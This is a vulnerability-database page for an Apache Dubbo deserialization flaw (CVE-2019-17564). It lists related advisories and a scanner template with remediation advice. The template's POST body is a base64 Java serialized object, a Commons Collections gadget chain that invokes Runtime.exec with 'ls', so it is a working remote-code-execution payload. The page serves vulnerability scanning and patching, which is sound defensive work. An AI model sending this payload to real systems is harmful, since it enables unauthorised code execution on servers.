| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform | 8 Dec 202020:38 | – | gitee | |
| The vulnerability of the Apache Dubbo RPC framework, related to deficiencies in the deserialization mechanism, allows attackers to execute arbitrary code. | 18 Aug 202500:00 | – | bdu_fstec | |
| CVE-2019-17564 | 2 Apr 202002:28 | – | circl | |
| Apache Dubbo Deserialization Vulnerability | 13 Feb 202000:00 | – | cnvd | |
| Apache Dubbo Insecure Deserialization (CVE-2019-17564) | 11 Mar 202000:00 | – | checkpoint_advisories | |
| CVE-2019-17564 | 1 Apr 202021:17 | – | cve | |
| CVE-2019-17564 | 1 Apr 202021:17 | – | cvelist | |
| Exploit for Deserialization of Untrusted Data in Apache Dubbo | 20 Feb 202008:28 | – | githubexploit | |
| Deserialization of Untrusted Data in Apache Dubbo | 24 May 202217:13 | – | github | |
| CVE-2019-17564 | 1 Apr 202022:15 | – | nvd |
id: CVE-2019-17564
info:
name: Apache Dubbo 2.5.x-2.7.4 - Insecure Deserialization
author: Khalid6468
severity: critical
description: |
Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a Provider instance of Apache Dubbo, if this instance enables HTTP. This issue affected Apache Dubbo 2.7.0 to 2.7.4, 2.6.0 to 2.6.7, and all 2.5.x versions.
impact: |
Unauthenticated attackers can exploit unsafe deserialization to execute arbitrary code on Dubbo Provider instances with HTTP remoting enabled, leading to complete server compromise.
remediation: |
Upgrade to Apache Dubbo version 2.7.5 or later, or disable HTTP remoting if not required.
reference:
- https://advisory.checkmarx.net/advisory/CX-2020-4275
- https://github.com/Hu3sky/CVE-2019-17564
- https://github.com/r00t4dm/CVE-2019-17564
- https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-17564
cwe-id: CWE-502
epss-score: 0.35564
epss-percentile: 0.98257
cpe: cpe:2.3:a:apache:dubbo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: dubbo
fofa-query: app="apache-dubbo"
tags: cve,cve2019,dubbo,apache,deserialization,rce,vkev,vuln
variables:
interface: "com.example.TestService"
http:
- method: POST
path:
- "{{BaseURL}}/{{interface}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
{{base64_decode('rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AAJsc3QABGV4ZWN1cQB+ABsAAAABcQB+ACBzcQB+AA9zcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh4')}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "java.lang.ClassNotFoundException"
- "java.io.InvalidClassException"
- "java.lang.ClassCastException"
- "java.io.StreamCorruptedException"
- "java.rmi.RemoteException: Deserialized object needs to be assignable"
condition: or
- type: status
status:
- 500
- 400
extractors:
- type: regex
part: body
regex:
- "java\\.lang\\..*Exception"
- "java\\.io\\..*Exception"
# digest: 4a0a00473045022100bfe61529bb74778fb4ac30f6aa561b89e2e1bb90bd83683d8814821520b422b8022030456d1b1869eb64abb4e558ea32d409ccb49db28e5bf39dc32b832edd7f6ad9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation